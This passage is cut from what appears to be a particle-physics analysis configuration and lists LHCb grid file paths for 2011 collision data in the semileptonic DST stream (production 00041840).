'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00021471_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00020561_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00010517_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00000256_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00046160_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00022420_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00056496_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00006846_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00049607_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00029515_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00007741_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00000565_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00027130_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00064842_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00030391_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00033495_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00046123_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00037774_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00061264_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00058699_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00034736_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00020352_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00062342_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00064457_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00062488_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00060935_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00053669_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00017015_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00029610_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00039510_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00041674_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00027624_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00003190_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00058030_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00009768_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00045182_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00001798_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00044312_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00068120_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00026802_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00049319_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00060462_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00034752_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00043645_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00001223_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00009476_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00061830_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00025707_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00055622_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00008602_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00012843_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00002129_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00000802_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00046125_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00040854_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00030518_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00027463_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00062491_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00031655_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00020435_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00035890_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00054432_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00049295_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00002988_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00027331_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00039366_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00037859_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00002181_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00055226_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00027344_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00047778_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00058369_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00001091_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00004075_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00058946_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00058491_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00053808_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00050278_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00013245_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00003246_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00048307_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00037263_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00033802_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00021364_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00022700_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00002026_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00020931_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00015118_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00025515_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00062246_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00020845_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00041898_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00058893_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00002327_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00061669_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00012684_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00063323_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00002542_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00065225_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00013493_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00018130_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00005215_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00002497_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00066161_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00023356_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00010271_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00021824_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00025098_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00014919_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00030621_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00014807_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00061871_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00065782_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00005458_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00015329_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00045531_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00028847_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00057320_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00022003_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00042088_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00021288_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00055941_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00043354_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00016559_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00047720_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00062550_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00003098_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00051536_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00019938_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00039899_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00036424_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00034480_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00028965_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00043480_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00005512_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00051926_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00061576_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00025896_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00047031_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00041675_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00014301_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00022473_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00052435_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00000314_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00061901_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00068181_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00006553_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00036846_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00041997_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00036274_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00063159_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00000126_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00003113_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00065611_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00049622_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00009029_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00015844_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00026291_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00023904_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00018489_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00060323_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00021184_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00059123_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00037172_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00054174_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00005485_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00062261_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00051921_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00040468_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00057081_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00059231_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00018269_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00008044_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00042269_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00053422_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00054918_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00015665_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00067853_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00017679_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00012174_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00032768_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00016421_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00002411_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00024481_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00022123_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00028264_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00025359_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00017282_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00002838_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00052863_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00057969_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00016973_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00046656_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00051828_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00063806_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00045460_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00058267_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00059005_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00000757_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00024364_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00049047_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00059477_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00029094_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00043484_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00067038_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00042427_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00003538_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00033148_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00053913_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00014069_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00057003_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00035749_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00000098_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00040283_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00000371_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00014550_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00001010_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00008154_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00067567_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00018490_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00009706_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00044470_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00014332_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00059160_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00007665_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00022624_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00046004_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00058389_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00058270_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00039978_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00019469_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00035321_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00034632_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00049836_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00057209_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00040323_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00040971_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00008457_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00038929_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00039384_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00025390_1.semileptonic.dst',
